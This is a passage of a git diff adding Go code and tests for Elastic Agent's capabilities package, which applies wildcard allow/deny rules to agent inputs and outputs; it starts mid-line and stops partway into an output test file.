fmt.Sprintf("%s-result.yml", tc))) + defer resultCloser.Close() + + expectedMap, err := expectedConfig.ToMapStr() + fixInputsType(expectedMap) + fixInputsType(resultConfig) + + if !assert.True(t, cmp.Equal(expectedMap, resultConfig)) { + diff := cmp.Diff(expectedMap, resultConfig) + if diff != "" { + t.Errorf("%s mismatch (-want +got):\n%s", tc, diff) + } + } + }) + } +} + +func TestInvalidLoadCapabilities(t *testing.T) { + testCases := []string{ + "invalid", + "invalid_output", + } + + l, _ := logger.New("test") + + for _, tc := range testCases { + t.Run(tc, func(t *testing.T) { + filename := filepath.Join("testdata", fmt.Sprintf("%s-capabilities.yml", tc)) + controller := status.NewController(l) + caps, err := Load(filename, l, controller) + assert.NoError(t, err) + assert.NotNil(t, caps) + + cfg, configCloser := getConfigWithCloser(t, filepath.Join("testdata", fmt.Sprintf("%s-config.yml", tc))) + defer configCloser.Close() + + mm, err := cfg.ToMapStr() + assert.NoError(t, err) + assert.NotNil(t, mm) + + _, err = caps.Apply(mm) + assert.Error(t, err, "should be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + }) + } +} + +func getConfigWithCloser(t *testing.T, cfgFile string) (*config.Config, io.Closer) { + configFile, err := os.Open(cfgFile) + require.NoError(t, err) + + cfg, err := config.NewConfigFrom(configFile) + require.NoError(t, err) + require.NotNil(t, cfg) + + return cfg, configFile +} + +func fixInputsType(mm map[string]interface{}) { + if i, found := mm[inputsKey]; found { + var inputs []interface{} + + if im, ok := i.([]map[string]interface{}); ok { + for _, val := range im { + inputs = append(inputs, val) + } + } else if im, ok := i.([]interface{}); ok { + inputs = im + } + mm[inputsKey] = inputs + } +} + +func TestCapabilityManager(t *testing.T) { + l := newErrorLogger(t) + + t.Run("filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before block", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + blockCap{}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.Error(t, err, "should be failing") + assert.Equal(t, ErrBlocked, err, "should be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter after block", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + blockCap{}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.Error(t, err, "should be failing") + assert.Equal(t, ErrBlocked, err, "should be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before keep", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + keepAsIsCap{}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter after keep", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + keepAsIsCap{}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + val, found := newMap["key"] + assert.True(t, found, "filter filters additional keys") + assert.Equal(t, "val", val, "filter modifies additional keys") + }) + + t.Run("filter before filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "filter"}, + filterKeywordCap{keyWord: "key"}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + _, found = newMap["key"] + assert.False(t, found, "filter filters additional keys") + }) + t.Run("filter after filter", func(t *testing.T) { + m := getConfig() + mgr := &capabilitiesManager{ + caps: []Capability{ + filterKeywordCap{keyWord: "key"}, + filterKeywordCap{keyWord: "filter"}, + }, + reporter: status.NewController(l).Register("test"), + } + + newIn, err := mgr.Apply(m) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := newIn.(map[string]string) + assert.True(t, ok, "new input is not a map") + + _, found := newMap["filter"] + assert.False(t, found, "filter does not filter keyword") + + _, found = newMap["key"] + assert.False(t, found, "filter filters additional keys") + }) +} + +type keepAsIsCap struct{} + +func (keepAsIsCap) Apply(in interface{}) (interface{}, error) { + return in, nil +} + +type blockCap struct{} + +func (blockCap) Apply(in interface{}) (interface{}, error) { + return in, ErrBlocked +} + +type filterKeywordCap struct { + keyWord string +} + +func (f filterKeywordCap) Apply(in interface{}) (interface{}, error) { + mm, ok := in.(map[string]string) + if !ok { + return in, nil + } + + delete(mm, f.keyWord) + return mm, nil +} + +func getConfig() map[string]string { + return map[string]string{ + "filter": "f_val", + "key": "val", + } +} + +func newErrorLogger(t *testing.T) *logger.Logger { + t.Helper() + + loggerCfg := logger.DefaultLoggingConfig() + loggerCfg.Level = logp.ErrorLevel + + log, err := logger.NewFromConfig("", loggerCfg) + require.NoError(t, err) + return log +} diff --git a/x-pack/elastic-agent/pkg/capabilities/expr.go b/x-pack/elastic-agent/pkg/capabilities/expr.go new file mode 100644 index 000000000000..8d22f61d519c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/expr.go @@ -0,0 +1,37 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import "strings" + +const ( + wild = "*" + separator = "/" +) + +func matchesExpr(pattern, target string) bool { + if pattern == wild { + return true + } + + patternParts := strings.Split(pattern, separator) + targetParts := strings.Split(target, separator) + + if len(patternParts) != len(targetParts) { + return false + } + + for i, pp := range patternParts { + if pp == wild { + continue + } + + if pp != targetParts[i] { + return false + } + } + + return true +} diff --git a/x-pack/elastic-agent/pkg/capabilities/expr_test.go b/x-pack/elastic-agent/pkg/capabilities/expr_test.go new file mode 100644 index 000000000000..2021d68d4a6c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/expr_test.go @@ -0,0 +1,43 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "gotest.tools/assert" +) + +func TestExpr(t *testing.T) { + cases := []struct { + Pattern string + Value string + ShouldMatch bool + }{ + {"", "", true}, + {"*", "", true}, + {"*", "test", true}, + {"*", "system/test", true}, + {"system/*", "system/test", true}, + {"*/test", "system/test", true}, + {"*/*", "system/test", true}, + {"system/*", "agent/test", false}, + {"*/test", "test/system", false}, + {"*/test", "test", false}, + {"*/*", "test", false}, + } + + for i, tc := range cases { + t.Run(fmt.Sprintf("testcase #%d", i), func(tt *testing.T) { + match := matchesExpr(tc.Pattern, tc.Value) + assert.Equal(t, + tc.ShouldMatch, + match, + fmt.Sprintf("'%s' and '%s' and expecting should match: %v", tc.Pattern, tc.Value, tc.ShouldMatch), + ) + }) + } +} diff --git a/x-pack/elastic-agent/pkg/capabilities/input.go b/x-pack/elastic-agent/pkg/capabilities/input.go new file mode 100644 index 000000000000..7ddc1a224966 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/input.go @@ -0,0 +1,265 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +const ( + inputsKey = "inputs" +) + +func newInputsCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiInputsCapability{log: log, caps: []*inputCapability{}}, nil + } + + caps := make([]*inputCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newInputCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiInputsCapability{log: log, caps: caps}, nil +} + +func newInputCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*inputCapability, error) { + cap, ok := r.(*inputCapability) + if !ok { + return nil, nil + } + + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type inputCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + Input string `json:"input" yaml:"input"` +} + +func (c *inputCapability) Apply(cfgMap map[string]interface{}) (map[string]interface{}, error) { + inputsIface, ok := cfgMap[inputsKey] + if ok { + if inputs := inputsMap(inputsIface, c.log); inputs != nil { + renderedInputs, err := c.renderInputs(inputs) + if err != nil { + c.log.Errorf("marking inputs failed for capability '%s': %v", c.name(), err) + return cfgMap, err + } + + cfgMap[inputsKey] = renderedInputs + return cfgMap, nil + } + + return cfgMap, nil + } + + return cfgMap, nil +} + +func inputsMap(cfgInputs interface{}, l *logger.Logger) []map[string]interface{} { + if inputs, ok := cfgInputs.([]map[string]interface{}); ok { + return inputs + } + + inputsSet, ok := cfgInputs.([]interface{}) + if !ok { + l.Warn("inputs is not an array") + return nil + } + + inputsMap := make([]map[string]interface{}, 0, len(inputsSet)) + for _, s := range inputsSet { + mm, ok := s.(map[string]interface{}) + if !ok { + continue + } + inputsMap = append(inputsMap, mm) + } + + return inputsMap +} + +func (c *inputCapability) Rule() string { + return c.Type +} + +func (c *inputCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g IA(*) or ID(system/*) + c.Name = fmt.Sprintf("I%s(%s)", t, c.Input) + return c.Name +} + +func (c *inputCapability) renderInputs(inputs []map[string]interface{}) ([]map[string]interface{}, error) { + newInputs := make([]map[string]interface{}, 0, len(inputs)) + + for i, input := range inputs { + inputTypeIface, found := input[typeKey] + if !found { + return newInputs, errors.New(fmt.Sprintf("input '%d' is missing type key", i), errors.TypeConfig) + } + + inputType, ok := inputTypeIface.(string) + if !ok { + newInputs = append(newInputs, input) + continue + } + + // if input does not match definition continue + if !matchesExpr(c.Input, inputType) { + newInputs = append(newInputs, input) + continue + } + + if _, found := input[conditionKey]; found { + // we already visited + newInputs = append(newInputs, input) + continue + } + + isSupported := c.Type == allowKey + + input[conditionKey] = isSupported + if !isSupported { + c.log.Errorf("input '%s' is left out due to capability restriction '%s'", inputType, c.name()) + c.reporter.Update(status.Degraded) + } + + newInputs = append(newInputs, input) + } + + return newInputs, nil +} + +type multiInputsCapability struct { + caps []*inputCapability + log *logger.Logger +} + +func (c *multiInputsCapability) Apply(in interface{}) (interface{}, error) { + inputsMap, transform, err := configObject(in) + if err != nil { + c.log.Errorf("constructing config object failed for 'multi-inputs' capability '%s': %v", err) + return in, nil + } + if inputsMap == nil { + return in, nil + } + + for _, cap := range c.caps { + // input capability is not blocking + inputsMap, err = cap.Apply(inputsMap) + if err != nil { + return in, err + } + } + + inputsMap, err = c.cleanupInput(inputsMap) + if err != nil { + c.log.Errorf("cleaning up config object failed for capability 'multi-outputs': %v", err) + return in, nil + } + + if transform == nil { + return inputsMap, nil + } + + return transform(inputsMap), nil +} + +func (c *multiInputsCapability) cleanupInput(cfgMap map[string]interface{}) (map[string]interface{}, error) { + inputsIface, found := cfgMap[inputsKey] + if !found { + return cfgMap, nil + } + + inputsList, ok := inputsIface.([]map[string]interface{}) + if !ok { + return nil, fmt.Errorf("inputs must be an array") + } + + newInputs := make([]map[string]interface{}, 0, len(inputsList)) + + for _, inputMap := range inputsList { + acceptValue := true + conditionIface, found := inputMap[conditionKey] + if found { + conditionVal, ok := conditionIface.(bool) + if ok { + acceptValue = conditionVal + } + } + + if !acceptValue { + continue + } + + delete(inputMap, conditionKey) + newInputs = append(newInputs, inputMap) + } + + cfgMap[inputsKey] = newInputs + return cfgMap, nil +} + +func configObject(a interface{}) (map[string]interface{}, func(interface{}) interface{}, error) { + if ast, ok := a.(*transpiler.AST); ok { + fn := func(i interface{}) interface{} { + mm, ok := i.(map[string]interface{}) + if !ok { + return i + } + + ast, err := transpiler.NewAST(mm) + if err != nil { + return i + } + return ast + } + mm, err := ast.Map() + if err != nil { + return nil, nil, err + } + + return mm, fn, nil + } + + if mm, ok := a.(map[string]interface{}); ok { + fn := func(i interface{}) interface{} { + // return as is + return i + } + return mm, fn, nil + } + + return nil, nil, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/input_test.go b/x-pack/elastic-agent/pkg/capabilities/input_test.go new file mode 100644 index 000000000000..8416a81649bb --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/input_test.go @@ -0,0 +1,398 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestMultiInput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("no match", func(t *testing.T) { + + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "allow", + Input: "something_else", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("filters metrics", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("allows metrics only", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &inputCapability{ + Type: "allow", + Input: "system/metrics", + }, + &inputCapability{ + Type: "deny", + Input: "*", + }, + }, + } + + initialInputs := []string{"system/metrics", "system/logs", "something_else"} + expectedInputs := []string{"system/metrics"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("allows everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "allow", + Input: "*", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("deny everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "*", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("deny everything with noise", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &inputCapability{ + Type: "deny", + Input: "*", + }, + &inputCapability{ + Type: "allow", + Input: "something_else", + }, + }, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{} + runMultiInputTest(t, l, rd, expectedInputs, initialInputs) + }) + + t.Run("keep format", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputs(initialInputs...) + assert.NotNil(t, inputs) + + res, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + ast, ok := res.(*transpiler.AST) + assert.True(t, ok, "expecting an ast") + + inputsIface, found := transpiler.Lookup(ast, "inputs") + assert.True(t, found, "input not found") + + inputsList, ok := inputsIface.Value().(*transpiler.List) + assert.True(t, ok, "expecting a list for inputs") + + for _, in := range expectedInputs { + var typeFound bool + nodes := inputsList.Value().([]transpiler.Node) + for _, inputNode := range nodes { + typeNode, found := inputNode.Find("type") + assert.True(t, found, "type not found") + + typeNodeStr, ok := typeNode.Value().(*transpiler.StrVal) + assert.True(t, ok, "type node not strval") + inputType, ok := typeNodeStr.Value().(string) + assert.True(t, ok, "input type key not string") + if inputType == in { + typeFound = true + break + } + } + + assert.True(t, typeFound, fmt.Sprintf("input '%s' type key not found", in)) + } + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&inputCapability{ + Type: "deny", + Input: "system/metrics", + }}, + } + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{} + outAfter, err := cap.Apply(apiAction) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +func TestInput(t *testing.T) { + l, _ := logger.New("test") + tr := &testReporter{} + t.Run("invalid rule", func(t *testing.T) { + r := &upgradeCapability{} + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "", + } + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - 1/1 match", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics"} + expectedInputs := []string{"system/metrics"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - 0/1 match", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/logs"} + expectedInputs := []string{"system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - deny metrics", func(t *testing.T) { + r := &inputCapability{ + Type: "deny", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + + t.Run("valid action - multiple inputs 1 explicitely allowed", func(t *testing.T) { + r := &inputCapability{ + Type: "allow", + Input: "system/metrics", + } + + initialInputs := []string{"system/metrics", "system/logs"} + expectedInputs := []string{"system/metrics", "system/logs"} + runInputTest(t, l, r, expectedInputs, initialInputs) + }) + +} + +func runInputTest(t *testing.T, l *logger.Logger, r *inputCapability, expectedInputs []string, initialInputs []string) { + tr := &testReporter{} + cap, err := newInputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputsMap(initialInputs...) + assert.NotNil(t, inputs) + + newMap, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + inputsNode, found := newMap["inputs"] + assert.True(t, found, "inputsnot found") + + inputsList, ok := inputsNode.([]map[string]interface{}) + assert.True(t, ok, "inputs not a list") + + typesMap := make(map[string]bool) + for _, node := range inputsList { + typeNode, ok := node["type"] + if !ok { + continue + } + + inputType, ok := typeNode.(string) + if !ok { + continue + } + + conditionNode, ok := node[conditionKey] + if !ok { + // was not allowed nor denied -> allowing + typesMap[inputType] = true + continue + } + + isAllowed, ok := conditionNode.(bool) + if !ok { + assert.Fail(t, fmt.Sprintf("condition should be bool but it's not for input '%s'", inputType)) + continue + } + + if isAllowed { + typesMap[inputType] = true + } + } + + assert.Equal(t, len(expectedInputs), len(typesMap)) + for _, ei := range expectedInputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func runMultiInputTest(t *testing.T, l *logger.Logger, rd *ruleDefinitions, expectedInputs []string, initialInputs []string) { + tr := &testReporter{} + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputsMap(initialInputs...) + assert.NotNil(t, inputs) + + outAfter, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := outAfter.(map[string]interface{}) + assert.True(t, ok, "out ast should be AST") + assert.NotNil(t, newMap) + + inputsNode, found := newMap["inputs"] + assert.True(t, found, "inputsnot found") + + inputsList, ok := inputsNode.([]map[string]interface{}) + assert.True(t, ok, "inputs not a list") + + typesMap := make(map[string]bool) + for _, node := range inputsList { + typeNode, ok := node["type"] + if !ok { + continue + } + + inputType, ok := typeNode.(string) + if !ok { + continue + } + typesMap[inputType] = true + } + + assert.Equal(t, len(expectedInputs), len(typesMap)) + for _, ei := range expectedInputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func getInputs(tt ...string) *transpiler.AST { + astMap := getInputsMap(tt...) + ast, _ := transpiler.NewAST(astMap) + return ast +} + +func getInputsMap(tt ...string) map[string]interface{} { + astMap := make(map[string]interface{}) + inputs := make([]map[string]interface{}, 0, len(tt)) + + for _, t := range tt { + mm := map[string]interface{}{ + "type": t, + "use_output": "testing", + "data_stream.namespace": "default", + "streams": []map[string]interface{}{ + { + "metricset": "cpu", + "data_stream.dataset": "system.cpu", + }, + { + "metricset": "memory", + "data_stream.dataset": "system.memory", + }, + }, + } + inputs = append(inputs, mm) + } + + astMap["inputs"] = inputs + + return astMap +} + +type testReporter struct{} + +func (*testReporter) Update(status.AgentStatus) {} +func (*testReporter) Unregister() {} diff --git a/x-pack/elastic-agent/pkg/capabilities/output.go b/x-pack/elastic-agent/pkg/capabilities/output.go new file mode 100644 index 000000000000..34a9ca6e0553 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/output.go @@ -0,0 +1,211 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +const ( + outputKey = "outputs" + typeKey = "type" +) + +func newOutputsCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiOutputsCapability{log: log, caps: []*outputCapability{}}, nil + } + + caps := make([]*outputCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newOutputCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiOutputsCapability{log: log, caps: caps}, nil +} + +func newOutputCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*outputCapability, error) { + cap, ok := r.(*outputCapability) + if !ok { + return nil, nil + } + + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type outputCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + Output string `json:"output" yaml:"output"` +} + +func (c *outputCapability) Apply(cfgMap map[string]interface{}) (map[string]interface{}, error) { + outputIface, ok := cfgMap[outputKey] + if ok { + outputs, ok := outputIface.(map[string]interface{}) + if ok { + renderedOutputs, err := c.renderOutputs(outputs) + if err != nil { + c.log.Errorf("marking outputs failed for capability '%s': %v", c.name(), err) + return cfgMap, err + } + + cfgMap[outputKey] = renderedOutputs + return cfgMap, nil + } + + return cfgMap, nil + } + + return cfgMap, nil +} + +func (c *outputCapability) Rule() string { + return c.Type +} + +func (c *outputCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g OA(*) or OD(logstash) + c.Name = fmt.Sprintf("O%s(%s)", t, c.Output) + return c.Name +} + +func (c *outputCapability) renderOutputs(outputs map[string]interface{}) (map[string]interface{}, error) { + for outputName, outputIface := range outputs { + output, ok := outputIface.(map[string]interface{}) + if !ok { + continue + } + + outputTypeIface, ok := output[typeKey] + if !ok { + return nil, errors.New(fmt.Sprintf("output '%s' is missing type key", outputName), errors.TypeConfig) + } + + outputType, ok := outputTypeIface.(string) + if !ok { + continue + } + + // if input does not match definition continue + if !matchesExpr(c.Output, outputType) { + continue + } + + if _, found := output[conditionKey]; found { + // we already visited + continue + } + + isSupported := c.Type == allowKey + output[conditionKey] = isSupported + outputs[outputName] = output + + if !isSupported { + c.log.Errorf("output '%s' is left out due to capability restriction '%s'", outputName, c.name()) + c.reporter.Update(status.Degraded) + } + } + + return outputs, nil +} + +type multiOutputsCapability struct { + caps []*outputCapability + log *logger.Logger +} + +func (c *multiOutputsCapability) Apply(in interface{}) (interface{}, error) { + configMap, transform, err := configObject(in) + if err != nil { + c.log.Errorf("creating configuration object failed for capability 'multi-outputs': %v", err) + return in, nil + } + if configMap == nil { + return in, nil + } + + for _, cap := range c.caps { + // input capability is not blocking + configMap, err = cap.Apply(configMap) + if err != nil { + return in, err + } + } + + configMap, err = c.cleanupOutput(configMap) + if err != nil { + c.log.Errorf("cleaning up config object failed for capability 'multi-outputs': %v", err) + return in, nil + } + + if transform == nil { + return configMap, nil + } + + return transform(configMap), nil +} + +func (c *multiOutputsCapability) cleanupOutput(cfgMap map[string]interface{}) (map[string]interface{}, error) { + outputsIface, found := cfgMap[outputKey] + if !found { + return cfgMap, nil + } + + outputsMap, ok := outputsIface.(map[string]interface{}) + if !ok { + return nil, fmt.Errorf("outputs must be a map") + } + + for outputName, outputIface := range outputsMap { + acceptValue := true + + outputMap, ok := outputIface.(map[string]interface{}) + if ok { + conditionIface, found := outputMap[conditionKey] + if found { + conditionVal, ok := conditionIface.(bool) + if ok { + acceptValue = conditionVal + } + } + } + + if !acceptValue { + delete(outputsMap, outputName) + continue + } + + delete(outputMap, conditionKey) + } + + cfgMap[outputKey] = outputsMap + return cfgMap, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/output_test.go b/x-pack/elastic-agent/pkg/capabilities/output_test.go new file mode 100644 index 000000000000..fca32effadca --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/output_test.go @@ -0,0 +1,373 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestMultiOutput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("no match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "allow", + Output: "something_else", + }}, + } + + 